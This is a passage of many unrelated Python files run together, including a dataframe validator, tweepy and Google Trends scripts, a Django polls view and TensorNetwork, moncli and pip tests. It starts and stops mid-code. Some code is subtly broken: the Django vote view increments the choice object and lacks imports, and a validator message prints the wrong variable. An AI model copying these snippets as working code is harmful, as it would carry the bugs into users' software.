value) ) return False, reason # Check a minimum value is below above a threshold if min_is_below_rule is not None: comp = np.where(dataframe[column_name].min() > min_is_below_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} needs to reach under {} for processing, instead found:" "value={}".format(column_name, max_at_least_rule, value) ) return False, reason if monotonic_rule == 'increasing': diff_series = dataframe[column_name].diff().dropna() if len(diff_series[diff_series < 0]) > 0: reason = ( "{} needs to be monotonically increasing for processing".format(column_name) ) return False, reason return True, "" class BEEPValidationError(Exception): """Custom error to raise when validation fails"""
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from .ipython_api import IPythonAPI class Help_html(object): """ """ showfiles_base_url = None _pending_helps = {} @staticmethod def flush(window_location:str, options:dict={}): if (window_location.startswith("http://localhost") or window_location.startswith("https://localhost") or window_location.startswith("http://127.0.0.") or window_location.startswith("https://127.0.0.")): start = window_location[8:].find("/") + 9 parts = window_location[start:].split("/") parts.pop() Help_html.showfiles_base_url = window_location[:start] + "/".join(parts) else: notebook_service_address = options.get("notebook_service_address") if notebook_service_address is not None: host = notebook_service_address or "" start = host.find("//") + 2 suffix = "." + host[start:] else: suffix = ".notebooks.azure.com" end = window_location.find(suffix) start = window_location.find("//") # azure notebook environment, assume template: https://library-user.libray.notebooks.azure.com if start > 0 and end > 0 and ('-' in window_location): library, user = window_location[start + 2 : end].split("-", 1) host = notebook_service_address or "https://notebooks.azure.com" Help_html.showfiles_base_url = f"{host}/api/user/{user}/library/{library}/html" # assume just a remote kernel, as local else: parts = window_location.split("/") parts.pop() Help_html.showfiles_base_url = "/".join(parts) refresh = False for text, url in Help_html._pending_helps.items(): Help_html.add_menu_item(text, url, False, **options) refresh = True Help_html._pending_helps = {} if refresh: IPythonAPI.try_kernel_reconnect(**options) @staticmethod def add_menu_item(text, file_path: str, reconnect=True, **options): if not text: return if not file_path: return # add help link if file_path.startswith("http"): url = file_path elif Help_html.showfiles_base_url is not None: url = f"{Help_html.showfiles_base_url}/{file_path}" else: url = None if url: IPythonAPI.try_add_to_help_links(text, url, reconnect, **options) elif Help_html._pending_helps.get(text) is None: Help_html._pending_helps[text] = file_path
''' Created on 2017年1月8日 @author: Think 【程序15】 题目:利用条件运算符的嵌套来完成此题:学习成绩>=90分的同学用A表示,60-89分之间的用B表示,    60分以下的用C表示。 1.程序分析:(a>b)?a:b这是条件运算符的基本例子。 2.程序源代码: 不支持这个运算符 ''' from pip._vendor.distlib.compat import raw_input def jcp015(): score = int(raw_input('input score:\n')) if score >= 90: grade = 'A' elif score >= 60: grade = 'B' else: grade = 'C' print('%d belongs to %s' %(score,grade)) jcp015()
import tweepy, requests from credentials import * def create_api(): """Creates api object from tweepy using api auth credentials. """ auth = tweepy.OAuthHandler(api_key, secret_key) auth.set_access_token(access_token, access_token_secret) return tweepy.API(auth) def retrieve_tweet(api_object): """Used to get a tweet object from authorized api object. Inputs ------ Tweepy api object Returns ------- Tweepy tweet object in extended mode. """ tweet_url = input("Enter the URL of the tweet you would like analyzed.\n") tweet_id = tweet_url.split("/status/")[1] return api_object.get_status(tweet_id, tweet_mode="extended") def save_images(tweet_object): """Used to save any images from desired tweet. Inputs ------ Tweepy tweet object Returns ------- Saved images in the project folder. """ try: tweet_images = tweet_object.entities["media"] image_url = set() except KeyError: return print("No picture found.") for image in tweet_images: image_url.add(image["media_url"]) try: res = requests.get(image["media_url"]) res.raise_for_status() except: return print("No picture found.") return image_url # image_file = open("image1.jpg", "wb") # image_file.write(res.content) # image_file.close() if __name__ == "__main__": api = create_api() tweet = retrieve_tweet(api) tweet_body = print(tweet.full_text) save_images(tweet)
from ..distance_metrics import levenshtein_distance, hamming_distance from ..exceptions import DistanceMetricError class PhoneticAlgorithm: """ The main Phonetic Algorithm class, to ensure a unified API for all the included algorithms. """ def __init__(self): self.distances = { 'levenshtein': levenshtein_distance, 'hamming': hamming_distance, } def phonetics(self, word): """Get the phonetic representation of the word.""" pass def sounds_like(self, word1, word2): """Compare the phonetic representations of 2 words, and return a boolean value.""" return self.phonetics(word1) == self.phonetics(word2) def distance(self, word1, word2, metric='levenshtein'): """Get the similarity of the words, using the supported distance metrics.""" if metric in self.distances: distance_func = self.distances[metric] return distance_func(self.phonetics(word1), self.phonetics(word2)) else: raise DistanceMetricError('Distance metric not supported! Choose from levenshtein, hamming.')
# -*- coding: utf-8 -*- # Author: jS1ngle # License: MIT License (http://opensource.org/licenses/MIT) import pandas as pd import requests import matplotlib.pyplot as plt from pytrends.request import TrendReq import datetime from datetime import timedelta from scipy.stats.stats import pearsonr from SimulationHelperFunctions import get_hist_price_data # ===Input data timeWindow = 100 timeWindowMovingAvg = 5 coinTo = "BTC" ccFrom = "EUR" exchange = "Kraken" keywords = ["bitcoin"] # ===Get raw data df = get_hist_price_data(coinTo, ccFrom, timeWindow, exchange) df.columns = [['close', 'high', 'low', 'open', 'time', 'volumefrom', 'volumeto', 'date']] # ===Starting point to have the exact amount of data sp = len(df.time[timeWindowMovingAvg-1:]) # ===Pass data to pytrend and execute it beginDateWindow = datetime.datetime.now().date() - timedelta(days=timeWindow) pytrend = TrendReq() dataWindow = str(beginDateWindow) + " " + str(datetime.datetime.now().date()) pytrend.build_payload(keywords, cat=0, timeframe=dataWindow) dfTrend = pytrend.interest_over_time() # using interest over time function dfTrend.columns = ['keyword', 't'] # === Moving average maTrendPrice = df.close.rolling(center=False, window=timeWindowMovingAvg).mean() maTrendVolume = df.volumeto.rolling(center=False, window=timeWindowMovingAvg).mean() maTrendGoogle = dfTrend.keyword.rolling(center=False, window=timeWindowMovingAvg).mean() # === Flatten lists trend = dfTrend.keyword.tolist() close = [y for x in df['close'].values.tolist() for y in x] volume = [y for x in df['volumeto'].values.tolist() for y in x] date = [y for x in df['date'].values.tolist() for y in x] # === Drop last 3 entries since google is 3 days delayed close = close[:-3] volume = volume[:-3] date = date[:-3] # === Calc Pearson correlation coefficients priceCorrelationCoefficient = pearsonr(trend, close)[0] volumeCorrelationCoefficient = pearsonr(trend, volume)[0] print(priceCorrelationCoefficient) print(volumeCorrelationCoefficient) # ===Plot data price and trend fig, ax1 = plt.subplots() ax1.plot(date, close, 'r', label='Price', linewidth=1.5) ax1.set_ylabel('Price in Euro', color='r') ax2 = ax1.twinx() ax2.plot(trend, 'b', label='Google trend', linewidth=1.5) ax2.set_ylabel('Google trend', color='b') for label in ax1.xaxis.get_ticklabels(): label.set_rotation(45) ax1.xaxis.set_major_locator(plt.MaxNLocator(10)) fig.tight_layout() fig.savefig('correlating_price_trend.png') # ===Plot volume and trend fig2, ax3 = plt.subplots() ax3.plot(date, volume, 'g', label='Volume', linewidth=1.5) ax3.set_ylabel('Volume', color='g') ax4 = ax3.twinx() ax4.plot(trend, 'b', label='Google trend', linewidth=1.5) ax4.set_ylabel('Google trend', color='b') for label in ax3.xaxis.get_ticklabels(): label.set_rotation(45) ax3.xaxis.set_major_locator(plt.MaxNLocator(10)) fig2.tight_layout() plt.show() fig2.savefig('correlating_volume_trend.png')
from django.http import HttpResponse from django.shortcuts import render, get_object_or_404 from django.template import loader from .models import Question def index(request): ultima_questao_lista = Question.objects.order_by('data_publicacao')[:5] template = loader.get_template('polls/index.html') context = { 'ultima_quest_lista': ultima_questao_lista, } return HttpResponse(template.render(context, request)) def detail(request, question_id): return HttpResponse('Visualizando a votação de: %s' %question_id) def results(request, question_id): resultado = 'Você está olhando o resultado da votação de: %s' return HttpResponse(resultado % question_id) def vote(request, question_id): question = get_object_or_404(Question, pk=question_id) try: escolhida = question.txt_pergunta.get(pk=request.POST['escolha']) except: # Exibir o formulário de votação return render(request, 'polls/detail.html', { 'question': question, 'error_message': 'Você não selecionou todas as partidas!' }) else: escolhida += 1 escolhida.save() # Sempre retorna uma HttpResponseRedirect depois de operação # de POST obter sucesso. Isso previne que o dado seja enviado # duas vezes, caso usuário pressione botão voltar. return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
# Copyright 2019 The TensorNetwork Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import tensornetwork as tn import pytest import numpy as np from tensornetwork.block_sparse import (U1Charge, BlockSparseTensor, Index, BaseCharge) from tensornetwork.block_sparse.charge import charge_equal from tensornetwork.block_sparse.utils import _find_diagonal_sparse_blocks def get_random(shape, num_charges, dtype=np.float64): R = len(shape) charges = [ BaseCharge( np.random.randint(-5, 5, (shape[n], num_charges)), charge_types=[U1Charge] * num_charges) for n in range(R) ] flows = list(np.full(R, fill_value=False, dtype=np.bool)) indices = [Index(charges[n], flows[n]) for n in range(R)] return BlockSparseTensor.random(indices=indices, dtype=dtype) def get_square_matrix(shape, num_charges, dtype=np.float64): charge = BaseCharge( np.random.randint(-5, 5, (shape, num_charges)), charge_types=[U1Charge] * num_charges) flows = [True, False] indices = [Index(charge, flows[n]) for n in range(2)] return BlockSparseTensor.random(indices=indices, dtype=dtype) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_full_svd_names(num_charges): np.random.seed(10) a = tn.Node( get_random((10, 10), num_charges=num_charges), backend='symmetric') e1 = a[0] e2 = a[1] left, s, right, _, = tn.split_node_full_svd( a, [e1], [e2], left_name='left', middle_name='center', right_name='right', left_edge_name='left_edge', right_edge_name='right_edge') assert left.name == 'left' assert s.name == 'center' assert right.name == 'right' assert left.edges[-1].name == 'left_edge' assert s[0].name == 'left_edge' assert s[1].name == 'right_edge' assert right.edges[0].name == 'right_edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_rq_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_rq( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_qr_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_qr( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right, _ = tn.split_node( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_rq_unitarity(dtype, num_charges): np.random.seed(10) a = tn.Node( get_square_matrix(50, num_charges, dtype=dtype), backend='symmetric') r, q = tn.split_node_rq(a, [a[0]], [a[1]]) r[1] | q[0] qbar = tn.conj(q) q[1] ^ qbar[1] u1 = q @ qbar qbar[0] ^ q[0] u2 = qbar @ q blocks, _, shapes = _find_diagonal_sparse_blocks(u1.tensor.flat_charges, u1.tensor.flat_flows, len(u1.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u1.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) blocks, _, shapes = _find_diagonal_sparse_blocks(u2.tensor.flat_charges, u2.tensor.flat_flows, len(u2.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u2.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_rq(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges, dtype=dtype), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_rq(a, left_edges, right_edges) tn.check_correct([left, right]) result = tn.contract(left[3]) np.testing.assert_allclose(result.tensor.data, a.tensor.data) assert np.all([ charge_equal(result.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_qr_unitarity(dtype, num_charges): np.random.seed(10) a = tn.Node( get_square_matrix(50, num_charges, dtype=dtype), backend='symmetric') q, r = tn.split_node_qr(a, [a[0]], [a[1]]) r[0] | q[1] qbar = tn.conj(q) q[1] ^ qbar[1] u1 = q @ qbar qbar[0] ^ q[0] u2 = qbar @ q blocks, _, shapes = _find_diagonal_sparse_blocks(u1.tensor.flat_charges, u1.tensor.flat_flows, len(u1.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u1.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) blocks, _, shapes = _find_diagonal_sparse_blocks(u2.tensor.flat_charges, u2.tensor.flat_flows, len(u2.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u2.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_qr(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_qr(a, left_edges, right_edges) tn.check_correct([left, right]) result = tn.contract(left[3]) np.testing.assert_allclose(result.tensor.data, a.tensor.data) assert np.all([ charge_equal(result.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_conj(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') abar = tn.conj(a) np.testing.assert_allclose(abar.tensor.data, a.backend.conj(a.tensor.data)) assert np.all([ charge_equal(abar.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_transpose(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') order = [a[n] for n in reversed(range(5))] transpa = tn.transpose(a, [4, 3, 2, 1, 0]) a.reorder_edges(order) np.testing.assert_allclose(a.tensor.data, transpa.tensor.data) def test_switch_backend(): np.random.seed(10) a = tn.Node(np.random.rand(3, 3, 3), name="A", backend="numpy") b = tn.Node(np.random.rand(3, 3, 3), name="B", backend="numpy") c = tn.Node(np.random.rand(3, 3, 3), name="C", backend="numpy") nodes = [a, b, c] with pytest.raises(ValueError): tn.switch_backend(nodes, 'symmetric') @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_contract_trace_edges(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((3, 3, 3), num_charges=num_charges, dtype=dtype), backend='symmetric') with pytest.raises(ValueError): tn.contract_trace_edges(a) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_switch_backend_raises_error(num_charges): np.random.seed(10) a = tn.Node( get_random((3, 3, 3), num_charges=num_charges, dtype=np.float64), backend='symmetric') with pytest.raises(NotImplementedError): tn.switch_backend({a}, 'numpy') def test_switch_backend_raises_error_2(): np.random.seed(10) a = tn.Node(np.random.rand(3, 3, 3)) with pytest.raises(ValueError): tn.switch_backend({a}, 'symmetric')
#! /usr/bin/env python import json, sys import ddlib # Load the ddlib Python library for NLP functions # For each input row for line in sys.stdin: # Load the JSON object row = json.loads(line) # Output data print json.dumps(row)
import numpy as np red = np.array((1., 0, 0, 1.),'f4') orange = np.array((1., 0.498, 0, 1),'f4') yellow = np.array((1, 1, 0, 1.),'f4') green = np.array((0, 1, 0, 1.),'f4') cyan = np.array((0, 1., 1., 1.),'f4') blue = np.array((0, 0, 1., 1.),'f4') purple = np.array((1., 0, 1., 1.),'f4') white = np.array((1.,1,1,1),'f4') grey = np.array((0.498, 0.498, 0.498, 1.),'f4') black = np.array((0, 0, 0, 1.),'f4')
from unittest.mock import patch from nose.tools import ok_, eq_, raises from moncli import MondayClient, entities as en from moncli.enums import BoardKind USERNAME = 'test.user@foobar.org' GET_ME_RETURN_VALUE = en.User(**{'creds': None, 'id': '1', 'email': USERNAME}) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.duplicate_group') def test_should_duplicate_a_group(duplicate_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} duplicate_group.return_value = {'id': 'group_01', 'title': 'Group 1 (copy)'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.duplicate() # Assert ok_(group != None) eq_(group.title, 'Group 1 (copy)') @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.archive_group') def test_should_archive_a_group(archive_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} archive_group.return_value = {'id': 'group_01', 'title': 'Group 1', 'archived': 'true'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.archive() # Assert ok_(group != None) eq_(group.title, 'Group 1') eq_(group.archived, True) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.delete_group') def test_should_delete_a_group(delete_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} delete_group.return_value = {'id': 'group_01', 'title': 'Group 1', 'deleted': 'true'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.delete() # Assert ok_(group != None) eq_(group.title, 'Group 1') eq_(group.deleted, True) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.create_item') def test_should_create_an_item(create_item, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} create_item.return_value = {'id': '1', 'name': 'Item 1'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act item = group.add_item('Item 1') # Assert ok_(item != None) eq_(item.name, 'Item 1') @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.get_boards') @patch('moncli.api_v2.get_items') def test_should_retrieve_a_list_of_items(get_items, get_boards, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} get_boards.return_value = [ {'id': '1', 'groups': [ {'id': 'group_01', 'items':[ {'id': '1', 'name': 'Item 1'}]}]}] client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act items = group.get_items() # Assert ok_(items != None) eq_(len(items), 1) eq_(items[0].name, 'Item 1')
import sys import antlr3 import antlr3.tree from LangLexer import LangLexer from LangParser import LangParser from LangDumpDecl import LangDumpDecl cStream = antlr3.FileStream(sys.argv[1]) lexer = LangLexer(cStream) tStream = antlr3.CommonTokenStream(lexer) parser = LangParser(tStream) r = parser.start() print "tree: "+r.tree.toStringTree() nodes = antlr3.tree.CommonTreeNodeStream(r.tree) nodes.setTokenStream(tStream) walker = LangDumpDecl(nodes) walker.decl()
import subprocess player = "vlc" returncode = subprocess.call(["which", "omxplayer"]) if returncode == 0: player = "omx" def play(path): if player == "vlc": subprocess.Popen(["cvlc", "--fullscreen", path]) elif player == "omx": subprocess.Popen(["omxplayer", path]) pass
import os OVERPASS = "https://overpass-api.de/api/interpreter/" DIR = os.path.dirname(os.path.abspath(__file__)) DATA_DIR = os.path.join(DIR, 'data') CACHE_DIR = os.path.join(DATA_DIR, 'cache') GEOMETRY_DIR = os.path.join(DATA_DIR, 'geometry') SPLIT_SIZE = 1.5 # optimal value for countries
"""Generate and work with PEP 425 Compatibility Tags. copied from pip-20.3.1 pip/tests/unit/test_utils_compatibility_tags.py download_url: https://raw.githubusercontent.com/pypa/pip/20.3.1/tests/unit/test_utils_compatibility_tags.py Copyright (c) 2008-2020 The pip developers (see AUTHORS.txt file) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from unittest.mock import patch import sysconfig import pytest import utils_pip_compatibility_tags @pytest.mark.parametrize( "version_info, expected", [ ((2,), "2"), ((2, 8), "28"), ((3,), "3"), ((3, 6), "36"), # Test a tuple of length 3. ((3, 6, 5), "36"), # Test a 2-digit minor version. ((3, 10), "310"), ], ) def test_version_info_to_nodot(version_info, expected): actual = utils_pip_compatibility_tags.version_info_to_nodot(version_info) assert actual == expected class Testcompatibility_tags(object): def mock_get_config_var(self, **kwd): """ Patch sysconfig.get_config_var for arbitrary keys. """ get_config_var = sysconfig.get_config_var def _mock_get_config_var(var): if var in kwd: return kwd[var] return get_config_var(var) return _mock_get_config_var def test_no_hyphen_tag(self): """ Test that no tag contains a hyphen. """ import pip._internal.utils.compatibility_tags mock_gcf = self.mock_get_config_var(SOABI="cpython-35m-darwin") with patch("sysconfig.get_config_var", mock_gcf): supported = pip._internal.utils.compatibility_tags.get_supported() for tag in supported: assert "-" not in tag.interpreter assert "-" not in tag.abi assert "-" not in tag.platform class TestManylinux2010Tags(object): @pytest.mark.parametrize( "manylinux2010,manylinux1", [ ("manylinux2010_x86_64", "manylinux1_x86_64"), ("manylinux2010_i686", "manylinux1_i686"), ], ) def test_manylinux2010_implies_manylinux1(self, manylinux2010, manylinux1): """ Specifying manylinux2010 implies manylinux1. """ groups = {} supported = utils_pip_compatibility_tags.get_supported(platforms=[manylinux2010]) for tag in supported: groups.setdefault((tag.interpreter, tag.abi), []).append(tag.platform) for arches in groups.values(): if arches == ["any"]: continue assert arches[:2] == [manylinux2010, manylinux1] class TestManylinux2014Tags(object): @pytest.mark.parametrize( "manylinuxA,manylinuxB", [ ("manylinux2014_x86_64", ["manylinux2010_x86_64", "manylinux1_x86_64"]), ("manylinux2014_i686", ["manylinux2010_i686", "manylinux1_i686"]), ], ) def test_manylinuxA_implies_manylinuxB(self, manylinuxA, manylinuxB): """ Specifying manylinux2014 implies manylinux2010/manylinux1. """ groups = {} supported = utils_pip_compatibility_tags.get_supported(platforms=[manylinuxA]) for tag in supported: groups.setdefault((tag.interpreter, tag.abi), []).append(tag.platform) expected_arches = [manylinuxA] expected_arches.extend(manylinuxB) for arches in groups.values(): if arches == ["any"]: continue assert arches[:3] == expected_arches
from .models import * from app import CONFIG, app from flask import escape import copy from flask_login import current_user from werkzeug.utils import secure_filename import os import requests def form_to_event_object(form): eventData = {} eventData['title'] = escape(form.title.data) eventData['description'] = escape(form.description.data) eventData['visibility'] = escape(int(form.visibility.data)) showings = [] for i in range(int(form.numShowings.data)): instanceDict = {} instanceDict["location"] = escape(form.locations.data[i]) instanceDict["start_datetime"] = str(escape(form.startDates.data[i])) + " " + str(escape(form.startTimes.data[i])) instanceDict["end_datetime"] = str(escape(form.endDates.data[i])) + " " + str(escape(form.endTimes.data[i])) showings.append(instanceDict) eventData['instances'] = showings eventData['creator'] = current_user.netid eventData['host'] = escape(form.host.data) eventData['tags'] = form.tags.data # If deletePoster field is not empty, # delete the poster field. if (form.deletePoster.data != ""): eventData["poster"] = None if (escape(form.link.data) != ""): eventData['trailer'] = escape(form.link.data) return eventData, len(showings) def make_edit_request(event_id, edits): headers = { "Authorization" : "Token %s" % current_user.token } return requests.post(CONFIG["BASE_URL"] + "/api/event/edit/"+event_id, json=edits, headers=headers) def make_delete_request(event_id): headers = { "Authorization" : "Token %s" % current_user.token } return requests.delete(CONFIG["BASE_URL"] + "/api/event/delete/"+event_id, headers=headers) def upload_file(event_id, file): if not allowed_file_type(file.filename): raise BadFileException("File must be .jpg, .jpeg, .png, or .gif.") # TODO: Some sort of resolution/file size requirement. # Currently all files are suffixed with -0. This is to make it easier for when # we support multiple images. file.filename = secure_filename(event_id+"-0."+get_file_type(file.filename)) # Compute file size. file.seek(0, os.SEEK_END) file_size = file.tell() / 1000 # Convert to kilobytes. file.seek(0, 0) if file_size > CONFIG["MAX_FILE_SIZE"]: raise BadFileException("File must not be greater than %d kB." % CONFIG["MAX_FILE_SIZE"]) url = upload_file_to_s3(file) return url
# MIT License # # Copyright (c) 2021 MrMat # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import os import logging import json import pathlib import contextlib import abc from typing import Optional, List, Dict import pytest import secrets import psycopg2 import psycopg2.sql import psycopg2.extensions from flask_migrate import upgrade from keycloak.keycloak_admin import KeycloakOpenID, KeycloakAdmin from keycloak.exceptions import KeycloakOperationError from mrmat_python_api_flask import create_app, db LOGGER = logging.getLogger(__name__) class TIException(Exception): skip: bool = False msg: str = 'An unexpected exception occurred' def __init__(self, msg: str, skip: Optional[bool] = False): self.skip = skip self.msg = msg class AbstractTestInfrastructure(abc.ABC): _app = None @abc.abstractmethod def app(self): pass @abc.abstractmethod def app_client(self): pass class NoTestInfrastructure(AbstractTestInfrastructure): @contextlib.contextmanager def app(self): self._app = create_app({ 'TESTING': True, 'SECRET_KEY': secrets.token_hex(16) }) with self._app.app_context(): upgrade(directory=os.path.join(os.path.dirname(__file__), '..', 'migrations')) db.create_all() yield self._app @contextlib.contextmanager def app_client(self): with self.app() as app: yield app.test_client() class LocalTestInfrastructure(object): """ A class for administration of the available test infrastructure """ _ti_config_path: pathlib.Path = None _ti_config: Dict = {} _pg_admin = None _keycloak_admin: KeycloakAdmin _auth_info: Dict = {} _app = None def __init__(self, ti_config_path: pathlib.Path): if not ti_config_path.exists(): raise TIException(skip=True, msg=f'Configuration at {ti_config_path} is not readable or does not exist') self._ti_config_path = ti_config_path self._ti_config = json.loads(self._ti_config_path.read_text(encoding='UTF-8')) if 'pg' not in self._ti_config or 'keycloak' not in self._ti_config: raise TIException(skip=True, msg='Missing configuration for local test infrastructure') try: self._pg_admin = psycopg2.connect(self._ti_config['pg'].get('admin_dsn')) self._keycloak_admin = 